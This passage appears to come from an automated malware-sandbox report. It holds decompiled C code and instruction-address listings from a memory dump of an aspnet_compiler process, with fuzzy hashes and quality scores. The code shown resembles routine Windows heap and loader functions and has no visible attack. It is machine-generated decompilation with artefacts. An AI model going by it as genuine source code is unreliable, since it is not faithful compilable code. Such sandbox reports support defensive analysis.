                          										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                          											L26:
                          											_t102 = E01422AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                          											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                          											__eflags = _t102 - 0xc0000100;
                          											if(_t102 != 0xc0000100) {
                          												goto L12;
                          											} else {
                          												_t99 = 1;
                          												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                          												goto L18;
                          											}
                          										} else {
                          											_t69 = E01406600( *((intOrPtr*)(_t91 + 0x1c)));
                          											__eflags = _t69;
                          											if(_t69 != 0) {
                          												goto L26;
                          											} else {
                          												_t83 =  *((intOrPtr*)(_t103 + 8));
                          												goto L18;
                          											}
                          										}
                          									} else {
                          										L18:
                          										_t102 = E01422C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                          										L19:
                          										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                          										goto L12;
                          									}
                          								}
                          								L28:
                          							} else {
                          								E0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                          								 *((intOrPtr*)(_t103 - 4)) = 1;
                          								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                          								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                          								_t76 = E01422AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                          								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                          								__eflags = _t76 - 0xc0000100;
                          								if(_t76 == 0xc0000100) {
                          									 *((intOrPtr*)(_t103 - 0x1c)) = E01422C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                          								}
                          								 *((intOrPtr*)(_t103 - 4)) = _t99;
                          								E01422ACB();
                          							}
                          						}
                          					}
                          					L12:
                          					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                          					_t62 = _t102;
                          				}
                          				L13:
                          				return E0144D0D1(_t62);
                          				goto L28;
                          			}





















                          0x01422990
                          0x01422992
                          0x01422997
                          0x014229a3
                          0x014229a6
                          0x014229ab
                          0x014229ad
                          0x014229b2
                          0x01465c80
                          0x014229b8
                          0x014229b8
                          0x014229bb
                          0x014229c0
                          0x014229c5
                          0x014229c6
                          0x014229c6
                          0x014229cb
                          0x00000000
                          0x00000000
                          0x014229cd
                          0x014229d0
                          0x014229d9
                          0x014229db
                          0x014229dd
                          0x01422a7f
                          0x01422a84
                          0x01422a87
                          0x01422a89
                          0x01465ca1
                          0x01465ca3
                          0x00000000
                          0x01422a8f
                          0x01422a8f
                          0x00000000
                          0x01422a8f
                          0x00000000
                          0x014229e3
                          0x014229e3
                          0x014229e3
                          0x00000000
                          0x014229e3
                          0x014229dd
                          0x00000000
                          0x014229db
                          0x014229e6
                          0x014229e9
                          0x014229eb
                          0x014229ed
                          0x014229f3
                          0x014229f5
                          0x014229f8
                          0x014229fa
                          0x01422a97
                          0x01422a9a
                          0x01422a9d
                          0x01422add
                          0x00000000
                          0x01422a9f
                          0x01422aa2
                          0x01422aa5
                          0x01422aa8
                          0x01422aab
                          0x01465cab
                          0x01465caf
                          0x01465cc5
                          0x01465cda
                          0x01465cdc
                          0x01465cdf
                          0x01465ce5
                          0x00000000
                          0x01465ceb
                          0x01465ced
                          0x01465cee
                          0x00000000
                          0x01465cee
                          0x01465cb1
                          0x01465cb4
                          0x01465cb9
                          0x01465cbb
                          0x00000000
                          0x01465cbd
                          0x01465cbd
                          0x00000000
                          0x01465cbd
                          0x01465cbb
                          0x01422ab1
                          0x01422ab1
                          0x01422ac4
                          0x01422ac6
                          0x01422ac6
                          0x00000000
                          0x01422ac6
                          0x01422aab
                          0x00000000
                          0x01422a00
                          0x01422a09
                          0x01422a0e
                          0x01422a21
                          0x01422a24
                          0x01422a35
                          0x01422a3a
                          0x01422a3d
                          0x01422a42
                          0x01422a59
                          0x01422a59
                          0x01422a5c
                          0x01422a5f
                          0x01422a5f
                          0x014229fa
                          0x014229f3
                          0x01422a64
                          0x01422a64
                          0x01422a6b
                          0x01422a6b
                          0x01422a6d
                          0x01422a72
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8311de58a755ad7a456bccf3f3db42782d6facab81d19977dafa04fc6ce8f461
                          • Instruction ID: 7fc681267c4b308c94434bee20244c70daf23d4bacc4729432afa1d66b8ce223
                          • Opcode Fuzzy Hash: 8311de58a755ad7a456bccf3f3db42782d6facab81d19977dafa04fc6ce8f461
                          • Instruction Fuzzy Hash: BC516A71A0022A9FDF25CF59C840EEEBBB5BF58350F40815AE900AB770C3718992CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E01424BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                          				signed int _v8;
                          				short _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				char _v36;
                          				char _v156;
                          				short _v158;
                          				intOrPtr _v160;
                          				char _v164;
                          				intOrPtr _v168;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t45;
                          				intOrPtr _t74;
                          				signed char _t77;
                          				intOrPtr _t84;
                          				char* _t85;
                          				void* _t86;
                          				intOrPtr _t87;
                          				signed short _t88;
                          				signed int _t89;
                          
                          				_t83 = __edx;
                          				_v8 =  *0x14ed360 ^ _t89;
                          				_t45 = _a8 & 0x0000ffff;
                          				_v158 = __edx;
                          				_v168 = __ecx;
                          				if(_t45 == 0) {
                          					L22:
                          					_t86 = 6;
                          					L12:
                          					E013FCC50(_t86);
                          					L11:
                          					return E0143B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                          				}
                          				_t77 = _a4;
                          				if((_t77 & 0x00000001) != 0) {
                          					goto L22;
                          				}
                          				_t8 = _t77 + 0x34; // 0xdce0ba00
                          				if(_t45 !=  *_t8) {
                          					goto L22;
                          				}
                          				_t9 = _t77 + 0x24; // 0x14e8504
                          				E01412280(_t9, _t9);
                          				_t87 = 0x78;
                          				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                          				E0143FA60( &_v156, 0, _t87);
                          				_t13 = _t77 + 0x30; // 0x3db8
                          				_t85 =  &_v156;
                          				_v36 =  *_t13;
                          				_v28 = _v168;
                          				_v32 = 0;
                          				_v24 = 0;
                          				_v20 = _v158;
                          				_v160 = 0;
                          				while(1) {
                          					_push( &_v164);
                          					_push(_t87);
                          					_push(_t85);
                          					_push(0x18);
                          					_push( &_v36);
                          					_push(0x1e);
                          					_t88 = E0143B0B0();
                          					if(_t88 != 0xc0000023) {
                          						break;
                          					}
                          					if(_t85 !=  &_v156) {
                          						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                          					}
                          					_t84 = L01414620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                          					_v168 = _v164;
                          					if(_t84 == 0) {
                          						_t88 = 0xc0000017;
                          						goto L19;
                          					} else {
                          						_t74 = _v160 + 1;
                          						_v160 = _t74;
                          						if(_t74 >= 0x10) {
                          							L19:
                          							_t86 = E013FCCC0(_t88);
                          							if(_t86 != 0) {
                          								L8:
                          								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                          								_t30 = _t77 + 0x24; // 0x14e8504
                          								E0140FFB0(_t77, _t84, _t30);
                          								if(_t84 != 0 && _t84 !=  &_v156) {
                          									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                          								}
                          								if(_t86 != 0) {
                          									goto L12;
                          								} else {
                          									goto L11;
                          								}
                          							}
                          							L6:
                          							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                          							if(_v164 != 0) {
                          								_t83 = _t84;
                          								E01424F49(_t77, _t84);
                          							}
                          							goto L8;
                          						}
                          						_t87 = _v168;
                          						continue;
                          					}
                          				}
                          				if(_t88 != 0) {
                          					goto L19;
                          				}
                          				goto L6;
                          			}


























                          0x01424bad
                          0x01424bbf
                          0x01424bc2
                          0x01424bc6
                          0x01424bcd
                          0x01424bd9
                          0x014667fe
                          0x01466800
                          0x01424ccc
                          0x01424ccd
                          0x01424cb7
                          0x01424cc9
                          0x01424cc9
                          0x01424bdf
                          0x01424be5
                          0x00000000
                          0x00000000
                          0x01424beb
                          0x01424bef
                          0x00000000
                          0x00000000
                          0x01424bf5
                          0x01424bf9
                          0x01424c06
                          0x01424c0b
                          0x01424c17
                          0x01424c1c
                          0x01424c1f
                          0x01424c25
                          0x01424c33
                          0x01424c3d
                          0x01424c40
                          0x01424c43
                          0x01424c47
                          0x01424c4d
                          0x01424c53
                          0x01424c54
                          0x01424c55
                          0x01424c56
                          0x01424c5b
                          0x01424c5c
                          0x01424c63
                          0x01424c6b
                          0x00000000
                          0x00000000
                          0x01466776
                          0x01466784
                          0x01466784
                          0x0146679f
                          0x014667a7
                          0x014667af
                          0x014667ce
                          0x00000000
                          0x014667b1
                          0x014667b7
                          0x014667b8
                          0x014667c1
                          0x014667d3
                          0x014667d9
                          0x014667dd
                          0x01424c94
                          0x01424c94
                          0x01424c98
                          0x01424c9c
                          0x01424ca3
                          0x014667f4
                          0x014667f4
                          0x01424cb5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01424cb5
                          0x01424c79
                          0x01424c7e
                          0x01424c89
                          0x01424c8b
                          0x01424c8f
                          0x01424c8f
                          0x00000000
                          0x01424c89
                          0x014667c3
                          0x00000000
                          0x014667c3
                          0x014667af
                          0x01424c73
                          0x00000000
                          0x00000000
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4626acb43f399e88a34e422be6f9f82e7571d556beeb648555dc93db76e5710c
                          • Instruction ID: 1a45f1a4bb39286daaa26af5f131917840e9f58d223f117cbdbdc5ed165843d9
                          • Opcode Fuzzy Hash: 4626acb43f399e88a34e422be6f9f82e7571d556beeb648555dc93db76e5710c
                          • Instruction Fuzzy Hash: F241C631A002299BDB21DF69C940FEA77B8EF55700F4600ABE908AB361D774DE85CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E01424D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                          				signed int _v12;
                          				char _v176;
                          				char _v177;
                          				char _v184;
                          				intOrPtr _v192;
                          				intOrPtr _v196;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed short _t42;
                          				char* _t44;
                          				intOrPtr _t46;
                          				intOrPtr _t50;
                          				char* _t57;
                          				intOrPtr _t59;
                          				intOrPtr _t67;
                          				signed int _t69;
                          
                          				_t64 = __edx;
                          				_v12 =  *0x14ed360 ^ _t69;
                          				_t65 = 0xa0;
                          				_v196 = __edx;
                          				_v177 = 0;
                          				_t67 = __ecx;
                          				_v192 = __ecx;
                          				E0143FA60( &_v176, 0, 0xa0);
                          				_t57 =  &_v176;
                          				_t59 = 0xa0;
                          				if( *0x14e7bc8 != 0) {
                          					L3:
                          					while(1) {
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t67 = _v192;
                          						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                          						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                          						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                          						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                          						_push( &_v184);
                          						_push(_t59);
                          						_push(_t57);
                          						_push(0xa0);
                          						_push(_t57);
                          						_push(0xf);
                          						_t42 = E0143B0B0();
                          						if(_t42 != 0xc0000023) {
                          							break;
                          						}
                          						if(_v177 != 0) {
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                          						}
                          						_v177 = 1;
                          						_t44 = L01414620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                          						_t59 = _v184;
                          						_t57 = _t44;
                          						if(_t57 != 0) {
                          							continue;
                          						} else {
                          							_t42 = 0xc0000017;
                          							break;
                          						}
                          					}
                          					if(_t42 != 0) {
                          						_t65 = E013FCCC0(_t42);
                          						if(_t65 != 0) {
                          							L10:
                          							if(_v177 != 0) {
                          								if(_t57 != 0) {
                          									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                          								}
                          							}
                          							_t46 = _t65;
                          							L12:
                          							return E0143B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                          						}
                          						L7:
                          						_t50 = _a4;
                          						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                          						if(_t50 != 3) {
                          							if(_t50 == 2) {
                          								goto L8;
                          							}
                          							L9:
                          							if(E0143F380(_t67 + 0xc, 0x13d5138, 0x10) == 0) {
                          								 *0x14e60d8 = _t67;
                          							}
                          							goto L10;
                          						}
                          						L8:
                          						_t64 = _t57 + 0x28;
                          						E01424F49(_t67, _t57 + 0x28);
                          						goto L9;
                          					}
                          					_t65 = 0;
                          					goto L7;
                          				}
                          				if(E01424E70(0x14e86b0, 0x1425690, 0, 0) != 0) {
                          					_t46 = E013FCCC0(_t56);
                          					goto L12;
                          				} else {
                          					_t59 = 0xa0;
                          					goto L3;
                          				}
                          			}




















                          0x01424d3b
                          0x01424d4d
                          0x01424d53
                          0x01424d58
                          0x01424d65
                          0x01424d6c
                          0x01424d71
                          0x01424d77
                          0x01424d7f
                          0x01424d8c
                          0x01424d8e
                          0x01424dad
                          0x01424db0
                          0x01424db7
                          0x01424db8
                          0x01424db9
                          0x01424dba
                          0x01424dbb
                          0x01424dc1
                          0x01424dc8
                          0x01424dcc
                          0x01424dd5
                          0x01424dde
                          0x01424ddf
                          0x01424de0
                          0x01424de1
                          0x01424de6
                          0x01424de7
                          0x01424de9
                          0x01424df3
                          0x00000000
                          0x00000000
                          0x01466c7c
                          0x01466c8a
                          0x01466c8a
                          0x01466c9d
                          0x01466ca7
                          0x01466cac
                          0x01466cb2
                          0x01466cb9
                          0x00000000
                          0x01466cbf
                          0x01466cbf
                          0x00000000
                          0x01466cbf
                          0x01466cb9
                          0x01424dfb
                          0x01466ccf
                          0x01466cd3
                          0x01424e32
                          0x01424e39
                          0x01466ce0
                          0x01466cf2
                          0x01466cf2
                          0x01466ce0
                          0x01424e3f
                          0x01424e41
                          0x01424e51
                          0x01424e51
                          0x01424e03
                          0x01424e03
                          0x01424e09
                          0x01424e0f
                          0x01424e57
                          0x00000000
                          0x00000000
                          0x01424e1b
                          0x01424e30
                          0x01424e5b
                          0x01424e5b
                          0x00000000
                          0x01424e30
                          0x01424e11
                          0x01424e11
                          0x01424e16
                          0x00000000
                          0x01424e16
                          0x01424e01
                          0x00000000
                          0x01424e01
                          0x01424da5
                          0x01466c6b
                          0x00000000
                          0x01424dab
                          0x01424dab
                          0x00000000
                          0x01424dab

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21db164620f7b254221ca826e961d5432ed02059391dbd8708b4aae2e02a823c
                          • Instruction ID: 92cddc0f52746136c9425f2f38aefafe2f7e3adbe5ca304c4f5c2a44d42f69e1
                          • Opcode Fuzzy Hash: 21db164620f7b254221ca826e961d5432ed02059391dbd8708b4aae2e02a823c
                          • Instruction Fuzzy Hash: E641C171A403289FEB22DF18CC80F67BBA9EB54614F45009BE9099B3A1D770DD84CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E01408A0A(intOrPtr* __ecx, signed int __edx) {
                          				signed int _v8;
                          				char _v524;
                          				signed int _v528;
                          				void* _v532;
                          				char _v536;
                          				char _v540;
                          				char _v544;
                          				intOrPtr* _v548;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t44;
                          				void* _t46;
                          				void* _t48;
                          				signed int _t53;
                          				signed int _t55;
                          				intOrPtr* _t62;
                          				void* _t63;
                          				unsigned int _t75;
                          				signed int _t79;
                          				unsigned int _t81;
                          				unsigned int _t83;
                          				signed int _t84;
                          				void* _t87;
                          
                          				_t76 = __edx;
                          				_v8 =  *0x14ed360 ^ _t84;
                          				_v536 = 0x200;
                          				_t79 = 0;
                          				_v548 = __edx;
                          				_v544 = 0;
                          				_t62 = __ecx;
                          				_v540 = 0;
                          				_v532 =  &_v524;
                          				if(__edx == 0 || __ecx == 0) {
                          					L6:
                          					return E0143B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                          				} else {
                          					_v528 = 0;
                          					E0140E9C0(1, __ecx, 0, 0,  &_v528);
                          					_t44 = _v528;
                          					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                          					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                          					_t46 = 0xa;
                          					_t87 = _t81 - _t46;
                          					if(_t87 > 0 || _t87 == 0) {
                          						 *_v548 = 0x13d1180;
                          						L5:
                          						_t79 = 1;
                          						goto L6;
                          					} else {
                          						_t48 = E01421DB5(_t62,  &_v532,  &_v536);
                          						_t76 = _v528;
                          						if(_t48 == 0) {
                          							L9:
                          							E01433C2A(_t81, _t76,  &_v544);
                          							 *_v548 = _v544;
                          							goto L5;
                          						}
                          						_t62 = _v532;
                          						if(_t62 != 0) {
                          							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                          							_t53 =  *_t62;
                          							_v528 = _t53;
                          							if(_t53 != 0) {
                          								_t63 = _t62 + 4;
                          								_t55 = _v528;
                          								do {
                          									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                          										if(E01408999(_t63,  &_v540) == 0) {
                          											_t55 = _v528;
                          										} else {
                          											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                          											_t55 = _v528;
                          											if(_t75 >= _t83) {
                          												_t83 = _t75;
                          											}
                          										}
                          									}
                          									_t63 = _t63 + 0x14;
                          									_t55 = _t55 - 1;
                          									_v528 = _t55;
                          								} while (_t55 != 0);
                          								_t62 = _v532;
                          							}
                          							if(_t62 !=  &_v524) {
                          								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                          							}
                          							_t76 = _t83 & 0x0000ffff;
                          							_t81 = _t83 >> 0x10;
                          						}
                          						goto L9;
                          					}
                          				}
                          			}



























                          0x01408a0a
                          0x01408a1c
                          0x01408a23
                          0x01408a2e
                          0x01408a30
                          0x01408a36
                          0x01408a3c
                          0x01408a3e
                          0x01408a4a
                          0x01408a52
                          0x01408a9c
                          0x01408aae
                          0x01408a58
                          0x01408a5e
                          0x01408a6a
                          0x01408a6f
                          0x01408a75
                          0x01408a7d
                          0x01408a85
                          0x01408a86
                          0x01408a89
                          0x01408a93
                          0x01408a99
                          0x01408a9b
                          0x00000000
                          0x01408aaf
                          0x01408abe
                          0x01408ac3
                          0x01408acb
                          0x01408ad7
                          0x01408ae0
                          0x01408af1
                          0x00000000
                          0x01408af1
                          0x01408acd
                          0x01408ad5
                          0x01408afb
                          0x01408afd
                          0x01408aff
                          0x01408b07
                          0x01408b22
                          0x01408b24
                          0x01408b2a
                          0x01408b2e
                          0x01408b3f
                          0x01408b78
                          0x01408b41
                          0x01408b52
                          0x01408b54
                          0x01408b5c
                          0x01408b74
                          0x01408b74
                          0x01408b5c
                          0x01408b3f
                          0x01408b5e
                          0x01408b61
                          0x01408b64
                          0x01408b64
                          0x01408b6c
                          0x01408b6c
                          0x01408b11
                          0x01459cd5
                          0x01459cd5
                          0x01408b17
                          0x01408b1a
                          0x01408b1a
                          0x00000000
                          0x01408ad5
                          0x01408a89

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a60aa188602e62872d95e40961cfaeb93b0eb1a8b9a4d2b421c06b442061de4
                          • Instruction ID: 38618cb6bb8dd469318512e39f458a5163599b7ac6a074ece1b34f34b1866b7e
                          • Opcode Fuzzy Hash: 5a60aa188602e62872d95e40961cfaeb93b0eb1a8b9a4d2b421c06b442061de4
                          • Instruction Fuzzy Hash: B94157B1E0022D9BDB25DF5AC988AAAB7F4EB54300F1045FAD919973A2D7709E81CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E014BAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                          				intOrPtr _v8;
                          				char _v12;
                          				signed int _v16;
                          				signed char _v20;
                          				intOrPtr _v24;
                          				char* _t37;
                          				void* _t47;
                          				signed char _t51;
                          				void* _t53;
                          				char _t55;
                          				intOrPtr _t57;
                          				signed char _t61;
                          				intOrPtr _t75;
                          				void* _t76;
                          				signed int _t81;
                          				intOrPtr _t82;
                          
                          				_t53 = __ecx;
                          				_t55 = 0;
                          				_v20 = _v20 & 0;
                          				_t75 = __edx;
                          				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                          				_v24 = __edx;
                          				_v12 = 0;
                          				if((_t81 & 0x01000000) != 0) {
                          					L5:
                          					if(_a8 != 0) {
                          						_t81 = _t81 | 0x00000008;
                          					}
                          					_t57 = E014BABF4(_t55 + _t75, _t81);
                          					_v8 = _t57;
                          					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                          						_t76 = 0;
                          						_v16 = _v16 & 0;
                          					} else {
                          						_t59 = _t53;
                          						_t76 = E014BAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                          						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                          							_t47 = E014BAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                          							_t61 = _v20;
                          							if(_t61 != 0) {
                          								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                          								if(E0149CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                          									L014177F0(_t53, 0, _t76);
                          									_t76 = 0;
                          								}
                          							}
                          						}
                          					}
                          					_t82 = _v8;
                          					L16:
                          					if(E01417D50() == 0) {
                          						_t37 = 0x7ffe0380;
                          					} else {
                          						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          					}
                          					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                          						E014B131B(_t53, _t76, _t82, _v16);
                          					}
                          					return _t76;
                          				}
                          				_t51 =  *(__ecx + 0x20);
                          				_v20 = _t51;
                          				if(_t51 == 0) {
                          					goto L5;
                          				}
                          				_t81 = _t81 | 0x00000008;
                          				if(E0149CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                          					_t55 = _v12;
                          					goto L5;
                          				} else {
                          					_t82 = 0;
                          					_t76 = 0;
                          					_v16 = _v16 & 0;
                          					goto L16;
                          				}
                          			}



















                          0x014baa1f
                          0x014baa21
                          0x014baa23
                          0x014baa2b
                          0x014baa30
                          0x014baa36
                          0x014baa39
                          0x014baa42
                          0x014baa75
                          0x014baa7a
                          0x014baa7c
                          0x014baa7c
                          0x014baa88
                          0x014baa8a
                          0x014baa8f
                          0x014bab02
                          0x014bab04
                          0x014baa99
                          0x014baaa8
                          0x014baaaf
                          0x014baab3
                          0x014baacc
                          0x014baad1
                          0x014baad6
                          0x014baae0
                          0x014baaf3
                          0x014baaf9
                          0x014baafe
                          0x014baafe
                          0x014baaf3
                          0x014baad6
                          0x014baab3
                          0x014bab07
                          0x014bab0a
                          0x014bab11
                          0x014bab23
                          0x014bab13
                          0x014bab1c
                          0x014bab1c
                          0x014bab2b
                          0x014bab44
                          0x014bab44
                          0x014bab51
                          0x014bab51
                          0x014baa44
                          0x014baa47
                          0x014baa4c
                          0x00000000
                          0x00000000
                          0x014baa5a
                          0x014baa64
                          0x014baa72
                          0x00000000
                          0x014baa66
                          0x014baa66
                          0x014baa68
                          0x014baa6a
                          0x00000000
                          0x014baa6a

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                          • Instruction ID: 087ae0de695e48d91f9d8e14b4b1e2432760b133e9414f7a643b5f9a190ff794
                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                          • Instruction Fuzzy Hash: DB31E332B042056BEB15CA69C8C5BEFFBBADF94210F25446AEA25A7361DA749D00C770
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E014BFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                          				char _v8;
                          				signed int _v12;
                          				signed int _t29;
                          				char* _t32;
                          				char* _t43;
                          				signed int _t80;
                          				signed int* _t84;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t56 = __edx;
                          				_t84 = __ecx;
                          				_t80 = E014BFD4E(__ecx, __edx);
                          				_v12 = _t80;
                          				if(_t80 != 0) {
                          					_t29 =  *__ecx & _t80;
                          					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                          					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                          						E014C0A13(__ecx, _t80, 0, _a4);
                          						_t80 = 1;
                          						if(E01417D50() == 0) {
                          							_t32 = 0x7ffe0380;
                          						} else {
                          							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          						}
                          						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                          							_push(3);
                          							L21:
                          							E014B1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                          						}
                          						goto L22;
                          					}
                          					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                          						_t80 = E014C2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                          						if(_t80 != 0) {
                          							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                          							_t77 = _v8;
                          							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                          								E014BC8F7(_t66, _t77, 0);
                          							}
                          						}
                          					} else {
                          						_t80 = E014BDBD2(__ecx[0xb], _t74, __edx, _a4);
                          					}
                          					if(E01417D50() == 0) {
                          						_t43 = 0x7ffe0380;
                          					} else {
                          						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          					}
                          					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                          						goto L22;
                          					} else {
                          						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                          						goto L21;
                          					}
                          				} else {
                          					_push(__ecx);
                          					_push(_t80);
                          					E014BA80D(__ecx[0xf], 9, __edx, _t80);
                          					L22:
                          					return _t80;
                          				}
                          			}










                          0x014bfde7
                          0x014bfde8
                          0x014bfdec
                          0x014bfdee
                          0x014bfdf5
                          0x014bfdf7
                          0x014bfdfc
                          0x014bfe19
                          0x014bfe22
                          0x014bfe26
                          0x014bfec6
                          0x014bfecd
                          0x014bfed5
                          0x014bfee7
                          0x014bfed7
                          0x014bfee0
                          0x014bfee0
                          0x014bfeef
                          0x014bff00
                          0x014bff02
                          0x014bff07
                          0x014bff07
                          0x00000000
                          0x014bfeef
                          0x014bfe33
                          0x014bfe55
                          0x014bfe59
                          0x014bfe5b
                          0x014bfe5e
                          0x014bfe69
                          0x014bfe6d
                          0x014bfe6d
                          0x014bfe69
                          0x014bfe35
                          0x014bfe41
                          0x014bfe41
                          0x014bfe79
                          0x014bfe8b
                          0x014bfe7b
                          0x014bfe84
                          0x014bfe84
                          0x014bfe93
                          0x00000000
                          0x014bfea8
                          0x014bfeba
                          0x00000000
                          0x014bfeba
                          0x014bfdfe
                          0x014bfe01
                          0x014bfe02
                          0x014bfe08
